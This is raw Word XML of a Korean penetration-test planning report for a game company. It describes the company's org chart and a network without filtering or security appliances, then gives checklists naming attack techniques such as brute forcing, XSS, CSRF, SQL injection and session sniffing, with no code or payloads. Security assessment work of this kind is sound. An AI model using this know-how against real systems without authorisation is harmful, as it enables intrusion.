      <w:r w:rsidR="00C90AE2">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C90AE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">차 </w:t>
      </w:r>
      <w:r w:rsidR="00C90AE2">
        <w:t>CBT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C90AE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>마치고 오픈베타 테스트 준비에 몰입한 상태</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C90AE2" w:rsidRPr="00C90AE2" w:rsidRDefault="00C90AE2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회사 전체가 로스트아크 출시 준비에 몰두하던 중</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>경쟁 게임에서 사회적인 이슈가 대두되면서</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>Soul</w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>Worker</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 갑작스럽게 인기를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>얻었고,</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>oul</w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 서비스를 본사와 분리해서</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t xml:space="preserve"> Smile</w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:t xml:space="preserve"> G</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>ate Entertainment</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>라는 사명으로 회사를 설립</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E08A0" w:rsidRDefault="002E08A0">
      <w:r>
        <w:br w:type="page"/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조직도 및 네트워크 구성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00664540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664540">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">조직도 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A042CE" w:rsidRDefault="00A042CE" w:rsidP="00A042CE"/>
    <w:p w:rsidR="00C90AE2" w:rsidRDefault="00C90AE2" w:rsidP="00C90A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799" cy="249555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2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E" w:rsidRDefault="00A042CE" w:rsidP="00C90AE2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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 xml:space="preserve">가장 상위에 대표 이사가 위치하고 회사 부서는 </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개로 분리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경영기획부는 회사 경영관련 경영기획,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인사,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>회계</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>법무 관련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개발관리부는 게임 개발과 관련된 업무를 수행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C90AE2" w:rsidRDefault="00C90AE2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운영관리부는 개발된 게임과 관련 서비스</w:t>
      </w:r>
      <w:r w:rsidR="00690FA5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00690FA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>운영 업무를 수행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FA5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사업지원부는 회사 사업의 홍보,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>지원,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>협약 등에 관련된 업무를 수행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990193" w:rsidRDefault="00690FA5" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>국제사업부는 동아시아 국가들을 비롯한 해외 여러 나라에서</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>게임을 출시,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서비스 를 원활하게 할 수 있도록 지원하는 역할</w:t>
      </w:r>
      <w:r w:rsidR="00990193">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 수행</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990193" w:rsidRDefault="00990193">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00C90311" w:rsidRDefault="009E6C11" w:rsidP="00C90311">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C90311">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>네트워크 구성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE5652" w:rsidRDefault="00990193" w:rsidP="00EC2F84">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00990193">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E687C54" wp14:editId="178E2F8A">
            <wp:extent cx="5238750" cy="3465029"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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19" cy="34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33"/>
        <w:gridCol w:w="2178"/>
        <w:gridCol w:w="2018"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE5652" w:rsidTr="00FE5652">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="226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193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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="217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2018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경영기획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관리부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개발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3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1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운영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4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2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사업지원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t>10.10.5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t xml:space="preserve">VPN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>외부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52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국제사업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6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지사 내부 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8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대표이사실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7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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2018" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FE5652" w:rsidRDefault="00FE5652" w:rsidP="00C22A52">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C22A52" w:rsidRDefault="00C22A52" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0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별도의 네트워크 보안 장비는 설치되어 있지 않은 상태</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003626ED" w:rsidRDefault="002E08A0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 xml:space="preserve">는 총 </w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개 운영,</w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>외부</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>망과 내부</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">망을 연결하는 경계 </w:t>
      </w:r>
      <w:r>
        <w:t>R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 xml:space="preserve">내부 직원 네트워크 대상 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>outer</w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버 관리부 및 서버실 네트워크 대상</w:t>
      </w:r>
      <w:r w:rsidR="003626ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>outer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003626ED" w:rsidRDefault="003626ED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2E08A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">실은 사용 빈도 및 가용성 관리를 기준으로 </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개의 네트워크로 분리해서 운영</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C22A52" w:rsidRDefault="003626ED" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C22A52">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">지사에서 본사에 접속할 수 있는 </w:t>
      </w:r>
      <w:r w:rsidR="00C22A52">
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidR="00EC2F84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 구성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC2F84" w:rsidRDefault="00EC2F84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외부에서 내부 웹 서버와 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버에만 접근할 수 있고,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>내부에서 인터넷 네트워크</w:t>
      </w:r>
      <w:r w:rsidR="007A2F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 접속 가능(</w:t>
      </w:r>
      <w:r w:rsidR="006D68AB">
        <w:t xml:space="preserve">R1 </w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:t>outer</w:t>
      </w:r>
      <w:r w:rsidR="006D68AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidR="007A2F92">
        <w:t xml:space="preserve">PAT </w:t>
      </w:r>
      <w:r w:rsidR="007A2F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>설정)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D68AB" w:rsidRDefault="006D68AB" w:rsidP="00CD0B2D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 xml:space="preserve">기타 내부에서는 별다른 네트워크 </w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:t>iltering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>은 이루어지고 있지 않음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00664540" w:rsidRDefault="004F56F1" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="1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9E6C11" w:rsidRPr="00664540">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>의뢰 요청 시나리오 및 요구 사항</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6F7D" w:rsidRDefault="004A6F7D" w:rsidP="004A6F7D"/>
    <w:p w:rsidR="003626ED" w:rsidRDefault="003626ED" w:rsidP="003626E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877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D" w:rsidRDefault="004A6F7D" w:rsidP="003626ED">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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내부 직원 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">보안 점검 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">회사 내부에서 직원들이 사용하고 있는 </w:t>
      </w:r>
      <w:r>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에서 보안 상으로 취약한 설정이 있는지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웹 서버 및 게임 서버에 대한 보안 점검 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>당사에서 가장 중요한 게임 서비스의 가용성 및 보안 상 취약점을 확인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기타 서비스 중인 서버에 대한 보안 점검 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>주요 서비스 관련 서버 외에도 회사 내부에서 사용 중인 서버에 대한 전반적인 보안 점검</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6F7D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회사 네트워크에 대한 보안 점검 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>회사에서 사용중인 네트워크를 구성하고 있는 장비들에 대한 점검</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC2F84" w:rsidRPr="009E6C11" w:rsidRDefault="004A6F7D" w:rsidP="00CD0B2D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지사 직원용 </w:t>
      </w:r>
      <w:r>
        <w:t>VPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 네트워크 보안 점검 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">외부 직원들이 본사 자원에 접근할 수 있도록 구성해놓은 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">VPN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>네트워크에 보안 상 취약점이 없는지 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E08A0" w:rsidRDefault="002E08A0">
      <w:r>
        <w:br w:type="page"/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모의 해킹</w:t>
      </w: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6C11" w:rsidRPr="00664540">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PC </w:t>
      </w:r>
      <w:r w:rsidR="004A6F7D" w:rsidRPr="00664540">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>현황</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11" w:rsidRPr="00664540">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> 점검</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="10"/>
        <w:tblW w:w="8029" w:type="dxa"/>
        <w:tblInd w:w="997" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1225"/>
        <w:gridCol w:w="5528"/>
        <w:gridCol w:w="1276"/>
      </w:tblGrid>
      <w:tr w:rsidR="00664540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점검 사항</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5528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1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00664540" w:rsidRDefault="00664540" w:rsidP="0066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</w:tcPr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60AD" w:rsidRDefault="006660AD" w:rsidP="00664540">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p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계정 정책</w:t>
            </w:r>
          </w:p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암호 정책(암호 복잡성, 최근 암호 기억, 최대 암호 사용기간, 최소 암호 길이)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr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4540" w:rsidRDefault="00664540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계정 잠금 정책(계정 잠금 기간, 계정 잠금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, 임계</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00664540">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>값 초기화 시간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관리자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Pr="00664540" w:rsidRDefault="00664540" w:rsidP="00664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게스트 계정 설정(계정 사용 여부 및 이름 변경 여부)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664540" w:rsidRDefault="00664540" w:rsidP="00664540"/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익명 사용자 권한 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge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</w:tcPr>
          <w:p w:rsidR="00901DE7" w:rsidRDefault="00901DE7" w:rsidP="00664540"/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원격 접속용 계정 구분 여부 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge w:val="restart"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P</w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00901D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901DE7" w:rsidRDefault="00901DE7" w:rsidP="00664540">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>감사 정책</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5528" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00901DE7" w:rsidRPr="00664540" w:rsidRDefault="00901D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개체 액세스 감사, 계정 로그온 이벤트 감사</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w:rsidR="00901DE7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40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664540" w:rsidRDefault="00664540" w:rsidP="00664540">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>백업</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5528" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00664540" w:rsidRDefault="00664540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540">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>백업 일정 설정</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00664540" w:rsidRDefault="00901D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체 </w:t>
            </w:r>
            <w:r>
              <w:t>PC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E970E7" w:rsidTr="0066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E970E7" w:rsidRDefault="00E970E7" w:rsidP="00664540">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">SSL </w:t>
            </w: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5528" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E970E7" w:rsidRPr="00664540" w:rsidRDefault="00E970E7" w:rsidP="0066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서버 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">SSL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>설정 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E970E7" w:rsidRDefault="00E970E7" w:rsidP="00664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 w:rsidR="00A6071B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004A6F7D" w:rsidRDefault="004A6F7D" w:rsidP="00664540">
      <w:pPr>
        <w:ind w:left="760"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00664540" w:rsidRDefault="006660AD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9E6C11" w:rsidRPr="00664540">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>보안점검 체크리스트</w:t>
      </w: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A6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보안 분류</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835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시스템 보안</w:t>
            </w:r>
          </w:p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Hos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ort Scanning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내부 부서 네트워크 및 외부 접속</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006660AD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/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsid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Null Session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윈도우 OS 서버(VPN, CA)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</w:p>
          <w:p w:rsidR="00A6071B" w:rsidRDefault="00A6071B" w:rsidP="006660AD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>웹 보안</w:t>
            </w:r>
          </w:p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PUT, Delete Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr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071B" w:rsidRDefault="00A6071B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서버</w:t>
            </w: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iffing(Sess</w:t>
            </w:r>
            <w:r w:rsidRPr="006660AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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Banner Grabb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irectory list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D/PW Brute Forcing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XSS(Session Hijacking)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CSRF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71B" w:rsidTr="0066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6071B" w:rsidRDefault="00A6071B" w:rsidP="006660AD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A6071B" w:rsidRPr="006660AD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 업로드 취약점</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w:rsidR="00A6071B" w:rsidRDefault="00A6071B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A6071B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6660AD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006660AD" w:rsidRDefault="006660AD" w:rsidP="006660AD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보안</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006660AD" w:rsidRPr="006660AD" w:rsidRDefault="006660AD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QL Injection(인증 우회, Blind Injection, Mass Injection, 저장 프로시저)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
          </w:tcPr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0AD" w:rsidRDefault="006660AD" w:rsidP="006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웹 서버, DB 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006660AD" w:rsidRDefault="006660AD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="10"/>
        <w:tblW w:w="8080" w:type="dxa"/>
        <w:tblInd w:w="929" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1476"/>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="3769"/>
      </w:tblGrid>
      <w:tr w:rsidR="006660AD" w:rsidTr="0072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6660AD" w:rsidRDefault="006660AD" w:rsidP="0072175F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>보안 분류</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835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내용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
